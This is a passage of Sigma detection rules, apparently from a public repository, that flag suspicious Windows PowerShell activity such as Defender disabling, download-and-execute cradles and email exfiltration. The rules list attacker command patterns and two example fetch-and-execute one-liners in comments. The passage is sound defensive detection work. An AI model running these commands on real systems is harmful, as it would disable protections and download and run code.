    "content": "title: Gzip Archive Decode Via PowerShell\nid: 98767d61-b2e8-4d71-b661-e36783ee24c1\nstatus: test\ndescription: Detects attempts of decoding encoded Gzip archives via PowerShell.\nreferences:\n    - https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution\nauthor: Hieu Tran\ndate: 2023-03-13\ntags:\n    - attack.command-and-control\n    - attack.t1132.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'GZipStream'\n            - '::Decompress'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative scripts may use this functionality. Use \"ParentImage\" in combination with the script names and allowed users and applications to filter legitimate executions\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_decrypt_pattern.yml",
    "content": "title: PowerShell Execution With Potential Decryption Capabilities\nid: 434c08ba-8406-4d15-8b24-782cb071a691\nstatus: test\ndescription: Detects PowerShell commands that decrypt an \".LNK\" \"file to drop the next stage of the malware.\nreferences:\n    - https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/\nauthor: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-30\nmodified: 2023-12-05\ntags:\n    - attack.execution\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        OriginalFileName:\n            - 'PowerShell.EXE'\n            - 'pwsh.dll'\n    selection_cli_dir:\n        CommandLine|contains:\n            - \"Get-ChildItem \"\n            - \"dir \"\n            - \"gci \"\n            - \"ls \"\n    selection_cli_gc:\n        CommandLine|contains:\n            - \"Get-Content \"\n            - \"gc \"\n            - 'cat '\n            - 'type '\n            - 'ReadAllBytes'\n    selection_cli_specific:\n        - CommandLine|contains|all:\n              - ' ^| '\n              - '\\*.lnk'\n              - '-Recurse'\n              - '-Skip '\n        - CommandLine|contains|all:\n              - ' -ExpandProperty '\n              - '\\*.lnk'\n              - 'WriteAllBytes'\n              - ' .length '\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml",
    "content": "title: Powershell Defender Disable Scan Feature\nid: 1ec65a5f-9473-4f12-97da-622044d6df21\nstatus: test\ndescription: Detects requests to disable Microsoft Defender features using PowerShell commands\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps\n    - https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE\n    - https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-03\nmodified: 2024-01-02\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cli_cmdlet:\n        CommandLine|contains:\n            - 'Add-MpPreference '\n            - 'Set-MpPreference '\n    selection_cli_option:\n        CommandLine|contains:\n            - 'DisableArchiveScanning '\n            - 'DisableRealtimeMonitoring '\n            - 'DisableIOAVProtection '\n            - 'DisableBehaviorMonitoring '\n            - 'DisableBlockAtFirstSeen '\n            - 'DisableCatchupFullScan '\n            - 'DisableCatchupQuickScan '\n    selection_cli_value:\n        CommandLine|contains:\n            - '$true'\n            - ' 1 '\n    selection_encoded_modifier:\n        CommandLine|base64offset|contains:\n            # Note: Since this is calculating offsets casing is important\n            - 'disablearchivescanning '\n            - 'DisableArchiveScanning '\n            - 'disablebehaviormonitoring '\n            - 'DisableBehaviorMonitoring '\n            - 'disableblockatfirstseen '\n            - 'DisableBlockAtFirstSeen '\n            - 'disablecatchupfullscan '\n            - 'DisableCatchupFullScan '\n            - 'disablecatchupquickscan '\n            - 'DisableCatchupQuickScan '\n            - 'disableioavprotection '\n            - 
'DisableIOAVProtection '\n            - 'disablerealtimemonitoring '\n            - 'DisableRealtimeMonitoring '\n    selection_encoded_direct:\n        CommandLine|contains:\n            - 'RABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgA'\n            - 'QAaQBzAGEAYgBsAGUAUgBlAGEAbAB0AGkAbQBlAE0AbwBuAGkAdABvAHIAaQBuAGcAIA'\n            - 'EAGkAcwBhAGIAbABlAFIAZQBhAGwAdABpAG0AZQBNAG8AbgBpAHQAbwByAGkAbgBnACAA'\n            - 'RABpAHMAYQBiAGwAZQBJAE8AQQBWAFAAcgBvAHQAZQBjAHQAaQBvAG4AIA'\n            - 'QAaQBzAGEAYgBsAGUASQBPAEEAVgBQAHIAbwB0AGUAYwB0AGkAbwBuACAA'\n            - 'EAGkAcwBhAGIAbABlAEkATwBBAFYAUAByAG8AdABlAGMAdABpAG8AbgAgA'\n            - 'RABpAHMAYQBiAGwAZQBCAGUAaABhAHYAaQBvAHIATQBvAG4AaQB0AG8AcgBpAG4AZwAgA'\n            - 'QAaQBzAGEAYgBsAGUAQgBlAGgAYQB2AGkAbwByAE0AbwBuAGkAdABvAHIAaQBuAGcAIA'\n            - 'EAGkAcwBhAGIAbABlAEIAZQBoAGEAdgBpAG8AcgBNAG8AbgBpAHQAbwByAGkAbgBnACAA'\n            - 'RABpAHMAYQBiAGwAZQBCAGwAbwBjAGsAQQB0AEYAaQByAHMAdABTAGUAZQBuACAA'\n            - 'QAaQBzAGEAYgBsAGUAQgBsAG8AYwBrAEEAdABGAGkAcgBzAHQAUwBlAGUAbgAgA'\n            - 'EAGkAcwBhAGIAbABlAEIAbABvAGMAawBBAHQARgBpAHIAcwB0AFMAZQBlAG4AIA'\n            - 'ZABpAHMAYQBiAGwAZQByAGUAYQBsAHQAaQBtAGUAbQBvAG4AaQB0AG8AcgBpAG4AZwAgA'\n            - 'QAaQBzAGEAYgBsAGUAcgBlAGEAbAB0AGkAbQBlAG0AbwBuAGkAdABvAHIAaQBuAGcAIA'\n            - 'kAGkAcwBhAGIAbABlAHIAZQBhAGwAdABpAG0AZQBtAG8AbgBpAHQAbwByAGkAbgBnACAA'\n            - 'ZABpAHMAYQBiAGwAZQBpAG8AYQB2AHAAcgBvAHQAZQBjAHQAaQBvAG4AIA'\n            - 'QAaQBzAGEAYgBsAGUAaQBvAGEAdgBwAHIAbwB0AGUAYwB0AGkAbwBuACAA'\n            - 'kAGkAcwBhAGIAbABlAGkAbwBhAHYAcAByAG8AdABlAGMAdABpAG8AbgAgA'\n            - 'ZABpAHMAYQBiAGwAZQBiAGUAaABhAHYAaQBvAHIAbQBvAG4AaQB0AG8AcgBpAG4AZwAgA'\n            - 'QAaQBzAGEAYgBsAGUAYgBlAGgAYQB2AGkAbwByAG0AbwBuAGkAdABvAHIAaQBuAGcAIA'\n            - 'kAGkAcwBhAGIAbABlAGIAZQBoAGEAdgBpAG8AcgBtAG8AbgBpAHQAbwByAGkAbgBnACAA'\n            - 'ZABpAHMAYQBiAGwAZQBiAGwAbwBjAGsAYQB0AGYAaQByAHMAdABzAGUAZQBuACAA'\n            - 'QAaQBzAGEAYgBsAGUAYgBsAG8AYwBrAGEAdABmAGkAcgBzAHQAcwBlAGUAbgAgA'\n            - 'kAGkAcwBhAGIAbABlAGIAbABvAGMAawBhAHQAZgBpAHIAcwB0AHMAZQBlAG4AIA'\n            - 'RABpAHMAYQBiAGwAZQBDAGEAdABjAGgAdQBwAEYAdQBsAGwAUwBjAGEAbgA'\n            - 'RABpAHMAYQBiAGwAZQBDAGEAdABjAGgAdQBwAFEAdQBpAGMAawBTAGMAYQBuAA'\n            - 'RABpAHMAYQBiAGwAZQBBAHIAYwBoAGkAdgBlAFMAYwBhAG4AbgBpAG4AZwA'\n    condition: all of selection_cli_* or 1 of selection_encoded_*\nfalsepositives:\n    - Possible administrative activity\n    - Other Cmdlets that may use the same parameters\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_defender_exclusion.yml",
    "content": "title: Powershell Defender Exclusion\nid: 17769c90-230e-488b-a463-e05c08e9d48f\nrelated:\n    - id: c1344fa2-323b-4d2e-9176-84b4d4821c88\n      type: similar\nstatus: test\ndescription: Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets\nreferences:\n    - https://learn.microsoft.com/en-us/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\n    - https://twitter.com/AdamTheAnalyst/status/1483497517119590403\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-04-29\nmodified: 2022-05-12\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        CommandLine|contains:\n            - 'Add-MpPreference '\n            - 'Set-MpPreference '\n    selection2:\n        CommandLine|contains:\n            - ' -ExclusionPath '\n            - ' -ExclusionExtension '\n            - ' -ExclusionProcess '\n            - ' -ExclusionIpAddress '\n    condition: all of selection*\nfalsepositives:\n    - Possible Admin Activity\n    - Other Cmdlets that may use the same parameters\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_disable_defender_av_security_monitoring.yml",
    "content": "title: Disable Windows Defender AV Security Monitoring\nid: a7ee1722-c3c5-aeff-3212-c777e4733217\nstatus: test\ndescription: Detects attackers attempting to disable Windows Defender using Powershell\nreferences:\n    - https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/\n    - https://rvsec0n.wordpress.com/2020/01/24/malwares-that-bypass-windows-defender/\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\nauthor: 'ok @securonix invrep-de, oscd.community, frack113'\ndate: 2020-10-12\nmodified: 2022-11-18\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_pwsh_binary:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_pwsh_cli:\n        CommandLine|contains:\n            - '-DisableBehaviorMonitoring $true'\n            - '-DisableRuntimeMonitoring $true'\n    selection_sc_binary:\n        - Image|endswith: '\\sc.exe'\n        - OriginalFileName: 'sc.exe'\n    selection_sc_tamper_cmd_stop:\n        CommandLine|contains|all:\n            - 'stop'\n            - 'WinDefend'\n    selection_sc_tamper_cmd_delete:\n        CommandLine|contains|all:\n            - 'delete'\n            - 'WinDefend'\n    selection_sc_tamper_cmd_disabled:\n        CommandLine|contains|all:\n            - 'config'\n            - 'WinDefend'\n            - 'start=disabled'\n    condition: all of selection_pwsh_* or (selection_sc_binary and 1 of selection_sc_tamper_*)\nfalsepositives:\n    - 'Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice.'\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_disable_firewall.yml",
    "content": "title: Windows Firewall Disabled via PowerShell\nid: 12f6b752-042d-483e-bf9c-915a6d06ad75\nrelated:\n    - id: 488b44e7-3781-4a71-888d-c95abfacf44d\n      type: similar\nstatus: test\ndescription: Detects attempts to disable the Windows Firewall using PowerShell\nreferences:\n    - https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html\nauthor: Tim Rauch, Elastic (idea)\ndate: 2022-09-14\nmodified: 2023-02-13\ntags:\n    - attack.defense-evasion\n    - attack.t1562\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_name:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\powershell_ise.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_args:\n        CommandLine|contains|all:\n            - 'Set-NetFirewallProfile '\n            - ' -Enabled '\n            - ' False'\n    selection_opt:\n        CommandLine|contains:\n            - ' -All '\n            - 'Public'\n            - 'Domain'\n            - 'Private'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_disable_ie_features.yml",
    "content": "title: Disabled IE Security Features\nid: fb50eb7a-5ab1-43ae-bcc9-091818cb8424\nstatus: test\ndescription: Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features\nreferences:\n    - https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-06-19\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        CommandLine|contains|all:\n            - ' -name IEHarden '\n            - ' -value 0 '\n    selection2:\n        CommandLine|contains|all:\n            - ' -name DEPOff '\n            - ' -value 1 '\n    selection3:\n        CommandLine|contains|all:\n            - ' -name DisableFirstRunCustomize '\n            - ' -value 2 '\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_downgrade_attack.yml",
    "content": "title: Potential PowerShell Downgrade Attack\nid: b3512211-c67e-4707-bedc-66efc7848863\nrelated:\n    - id: 6331d09b-4785-4c13-980f-f96661356249\n      type: derived\nstatus: test\ndescription: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0\nreferences:\n    - http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/\n    - https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#bypass-or-avoid-amsi-by-version-downgrade-\nauthor: Harish Segar (rule)\ndate: 2020-03-20\nmodified: 2023-01-04\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\powershell.exe'\n        CommandLine|contains:\n            - ' -version 2 '\n            - ' -versio 2 '\n            - ' -versi 2 '\n            - ' -vers 2 '\n            - ' -ver 2 '\n            - ' -ve 2 '\n            - ' -v 2 '\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_download_com_cradles.yml",
    "content": "title: Potential COM Objects Download Cradles Usage - Process Creation\nid: 02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf\nrelated:\n    - id: 3c7d1587-3b13-439f-9941-7d14313dbdfe\n      type: similar\nstatus: test\ndescription: Detects usage of COM objects that can be abused to download files in PowerShell by CLSID\nreferences:\n    - https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57\nauthor: frack113\ndate: 2022-12-25\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_1:\n        CommandLine|contains: '[Type]::GetTypeFromCLSID('\n    selection_2:\n        CommandLine|contains:\n            - '0002DF01-0000-0000-C000-000000000046'\n            - 'F6D90F16-9C73-11D3-B32E-00C04F990BB4'\n            - 'F5078F35-C551-11D3-89B9-0000F81FE221'\n            - '88d96a0a-f192-11d4-a65f-0040963251e5'\n            - 'AFBA6B42-5692-48EA-8141-DC517DCF0EF1'\n            - 'AFB40FFD-B609-40A3-9828-F88BBE11E4E3'\n            - '88d96a0b-f192-11d4-a65f-0040963251e5'\n            - '2087c2f4-2cef-4953-a8ab-66779b670495'\n            - '000209FF-0000-0000-C000-000000000046'\n            - '00024500-0000-0000-C000-000000000046'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of the library\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_download_cradle_obfuscated.yml",
    "content": "title: Obfuscated PowerShell OneLiner Execution\nid: 44e24481-6202-4c62-9127-5a0ae8e3fe3d\nstatus: test\ndescription: Detects the execution of a specific OneLiner to download and execute powershell modules in memory.\nreferences:\n    - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\n    - https://gist.github.com/mgeeky/3b11169ab77a7de354f4111aa2f0df38\nauthor: '@Kostastsale, TheDFIRReport'\ndate: 2022-05-09\nmodified: 2025-04-16\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1059.001\n    - attack.t1562.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        # Example: powershell -nop -noni -ep bypass -w h -c \"$u=(\"http://127.0.0.1:1337/\"|%%{(IRM $_)});&(\"\".SubString.ToString()[67,72,64]-Join\"\")($u); Import-Module C:\\Users\\EXAMPLE\\Invoke-WMIExec.ps1; Invoke-WMIExec\"\n        Image|endswith: '\\powershell.exe'\n        CommandLine|contains|all:\n            - 'http://127.0.0.1'\n            - '%{(IRM $_)}'\n            - 'Invoke'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_download_dll.yml",
    "content": "title: Potential DLL File Download Via PowerShell Invoke-WebRequest\nid: 0f0450f3-8b47-441e-a31b-15a91dc243e2\nstatus: test\ndescription: Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest or Invoke-RestMethod cmdlets.\nreferences:\n    - https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution\nauthor: Florian Roth (Nextron Systems), Hieu Tran\ndate: 2023-03-13\nmodified: 2025-07-18\ntags:\n    - attack.command-and-control\n    - attack.execution\n    - attack.t1059.001\n    - attack.t1105\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'Invoke-RestMethod '\n            - 'Invoke-WebRequest '\n            - 'IRM '\n            - 'IWR '\n        CommandLine|contains|all:\n            - 'http'\n            - 'OutFile'\n            - '.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_download_iex.yml",
    "content": "title: PowerShell Download and Execution Cradles\nid: 85b0b087-eddf-4a2b-b033-d771fa2b9775\nstatus: test\ndescription: Detects PowerShell download and execution cradles.\nreferences:\n    - https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd\n    - https://labs.withsecure.com/publications/fin7-target-veeam-servers\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-24\nmodified: 2025-07-18\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_download:\n        CommandLine|contains:\n            - '.DownloadString('\n            - '.DownloadFile('\n            - 'Invoke-WebRequest '\n            - 'iwr '\n            - 'Invoke-RestMethod '\n            - 'irm '  # powershell -ep bypass -w h -c irm test.domain/ffe | iex\n    selection_iex:\n        CommandLine|contains:\n            - ';iex $'\n            - '| IEX'\n            - '|IEX '\n            - 'I`E`X'\n            - 'I`EX'\n            - 'IE`X'\n            - 'iex '\n            - 'IEX ('\n            - 'IEX('\n            - 'Invoke-Expression'\n    condition: all of selection_*\nfalsepositives:\n    - Some PowerShell installers were seen using similar combinations. Apply filters accordingly\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_download_patterns.yml",
    "content": "title: PowerShell Download Pattern\nid: 3b6ab547-8ec2-4991-b9d2-2b06702a48d7\nrelated:\n    - id: e6c54d94-498c-4562-a37c-b469d8e9a275\n      type: derived\n    - id: 8f70ac5f-1f6f-4f8e-b454-db19561216c5\n      type: obsolete\nstatus: test\ndescription: Detects a Powershell process that contains download commands in its command line string\nreferences:\n    - https://blog.redteam.pl/2020/06/black-kingdom-ransomware.html\n    - https://lab52.io/blog/winter-vivern-all-summer/\n    - https://hatching.io/blog/powershell-analysis/\nauthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro\ndate: 2019-01-16\nmodified: 2025-10-20\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell_ise.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell_ISE.EXE'\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'new-object'\n            - 'net.webclient).'\n            - 'download'\n        CommandLine|contains:\n            - 'string('\n            - 'file('\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_download_susp_file_sharing_domains.yml",
    "content": "title: Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE\nid: b6e04788-29e1-4557-bb14-77f761848ab8\nstatus: test\ndescription: Detects potentially suspicious file downloads from file sharing domains using PowerShell.exe\nreferences:\n    - https://labs.withsecure.com/publications/fin7-target-veeam-servers\n    - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv\n    - https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/\n    - https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-02-23\nmodified: 2024-12-10\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_websites:\n        CommandLine|contains:\n            # Note: You might want to baseline the github domain before including it\n            # - '.githubusercontent.com'       # Includes both gists and github repositories / Michael Haag (idea).\n            - 'anonfiles.com'\n            - 'cdn.discordapp.com'\n            - 'ddns.net'\n            - 'dl.dropboxusercontent.com'\n            - 'ghostbin.co'\n            # - 'github.com'  See note above\n            - 'glitch.me'\n            - 'gofile.io'\n            - 'hastebin.com'\n            - 'mediafire.com'\n            - 'mega.nz'\n            - 'onrender.com'\n            - 'pages.dev'\n            - 'paste.ee'\n            - 'pastebin.com'\n            - 'pastebin.pl'\n            - 'pastetext.net'\n            - 'pixeldrain.com'\n            - 'privatlab.com'\n            - 'privatlab.net'\n            - 'send.exploit.in'\n            - 'sendspace.com'\n            - 'storage.googleapis.com'\n            - 'storjshare.io'\n            - 'supabase.co'\n            - 'temp.sh'\n            - 'transfer.sh'\n            - 'trycloudflare.com'\n            - 'ufile.io'\n            - 'w3spaces.com'\n            - 'workers.dev'\n    selection_download:\n        CommandLine|contains:\n            - '.DownloadString('\n            - '.DownloadFile('\n            - 'Invoke-WebRequest '\n            - 'iwr '\n            - 'wget '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_dsinternals_cmdlets.yml",
    "content": "title: DSInternals Suspicious PowerShell Cmdlets\nid: 43d91656-a9b2-4541-b7e2-6a9bd3a13f4e\nrelated:\n    - id: 846c7a87-8e14-4569-9d49-ecfd4276a01c\n      type: similar\nstatus: test\ndescription: |\n    Detects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files.\n    The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\nreferences:\n    - https://github.com/MichaelGrafnetter/DSInternals/blob/39ee8a69bbdc1cfd12c9afdd7513b4788c4895d4/Src/DSInternals.PowerShell/DSInternals.psd1\nauthor: Nasreddine Bencherchali (Nextron Systems), Nounou Mbeiri\ndate: 2024-06-26\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'Add-ADDBSidHistory'\n            - 'Add-ADNgcKey'\n            - 'Add-ADReplNgcKey'\n            - 'ConvertFrom-ADManagedPasswordBlob'\n            - 'ConvertFrom-GPPrefPassword'\n            - 'ConvertFrom-ManagedPasswordBlob'\n            - 'ConvertFrom-UnattendXmlPassword'\n            - 'ConvertFrom-UnicodePassword'\n            - 'ConvertTo-AADHash'\n            - 'ConvertTo-GPPrefPassword'\n            - 'ConvertTo-KerberosKey'\n            - 'ConvertTo-LMHash'\n            - 'ConvertTo-MsoPasswordHash'\n            - 'ConvertTo-NTHash'\n            - 'ConvertTo-OrgIdHash'\n            - 'ConvertTo-UnicodePassword'\n            - 'Disable-ADDBAccount'\n            - 'Enable-ADDBAccount'\n            - 'Get-ADDBAccount'\n            - 'Get-ADDBBackupKey'\n            - 'Get-ADDBDomainController'\n            - 'Get-ADDBGroupManagedServiceAccount'\n            - 'Get-ADDBKdsRootKey'\n            - 'Get-ADDBSchemaAttribute'\n            - 'Get-ADDBServiceAccount'\n            - 'Get-ADDefaultPasswordPolicy'\n            - 'Get-ADKeyCredential' # Covers 'Get-ADKeyCredentialLink'\n            - 'Get-ADPasswordPolicy'\n            - 'Get-ADReplAccount'\n            - 'Get-ADReplBackupKey'\n            - 'Get-ADReplicationAccount'\n            - 'Get-ADSIAccount'\n            - 'Get-AzureADUserEx'\n            - 'Get-BootKey'\n            - 'Get-KeyCredential'\n            - 'Get-LsaBackupKey'\n            - 'Get-LsaPolicy' # Covers 'Get-LsaPolicyInformation'\n            - 'Get-SamPasswordPolicy'\n            - 'Get-SysKey'\n            - 'Get-SystemKey'\n            - 'New-ADDBRestoreFromMediaScript'\n            - 'New-ADKeyCredential' # Covers 'New-ADKeyCredentialLink'\n            - 'New-ADNgcKey'\n            - 'New-NTHashSet'\n            - 'Remove-ADDBObject'\n            - 'Save-DPAPIBlob'\n            - 'Set-ADAccountPasswordHash'\n            - 'Set-ADDBAccountPassword' # Covers 'Set-ADDBAccountPasswordHash'\n            - 'Set-ADDBBootKey'\n            - 'Set-ADDBDomainController'\n            - 'Set-ADDBPrimaryGroup'\n            - 'Set-ADDBSysKey'\n            - 'Set-AzureADUserEx'\n            - 'Set-LsaPolicy' # Covers 'Set-LSAPolicyInformation'\n            - 'Set-SamAccountPasswordHash'\n            - 'Set-WinUserPasswordHash'\n            - 'Test-ADDBPasswordQuality'\n            - 'Test-ADPasswordQuality'\n            - 'Test-ADReplPasswordQuality'\n            - 'Test-PasswordQuality'\n            - 'Unlock-ADDBAccount'\n            - 'Write-ADNgcKey'\n            - 'Write-ADReplNgcKey'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of DSInternals for administration or audit purpose.\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_email_exfil.yml",
    "content": "title: Email Exfiltration Via Powershell\nid: 312d0384-401c-4b8b-abdf-685ffba9a332\nstatus: test\ndescription: Detects email exfiltration via powershell cmdlets\nreferences:\n    - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/\n    - https://github.com/Azure/Azure-Sentinel/blob/7e6aa438e254d468feec061618a7877aa528ee9f/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Email%20data%20exfiltration%20via%20PowerShell.yaml\nauthor: Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)\ndate: 2022-09-09\ntags:\n    - attack.exfiltration\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        CommandLine|contains|all:\n            - 'Add-PSSnapin'\n            - 'Get-Recipient'\n            - '-ExpandProperty'\n            - 'EmailAddresses'\n            - 'SmtpAddress'\n            - '-hidetableheaders'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_enable_susp_windows_optional_feature.yml",
    "content": "title: Potential Suspicious Windows Feature Enabled - ProcCreation\nid: c740d4cf-a1e9-41de-bb16-8a46a4f57918\nrelated:\n    - id: 55c925c1-7195-426b-a136-a9396800e29b\n      type: similar\nstatus: test\ndescription: |\n    Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\n    Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps\n    - https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system\n    - https://learn.microsoft.com/en-us/windows/wsl/install-on-server\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-29\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cmd:\n        CommandLine|contains|all:\n            - 'Enable-WindowsOptionalFeature'\n            - '-Online'\n            - '-FeatureName'\n    selection_feature:\n        # Add any insecure/unusual windows features that you don't use in your environment\n        CommandLine|contains:\n            - 'TelnetServer'\n            - 'Internet-Explorer-Optional-amd64'\n            - 'TFTP'\n            - 'SMB1Protocol'\n            - 'Client-ProjFS'\n            - 'Microsoft-Windows-Subsystem-Linux'\n    condition: all of 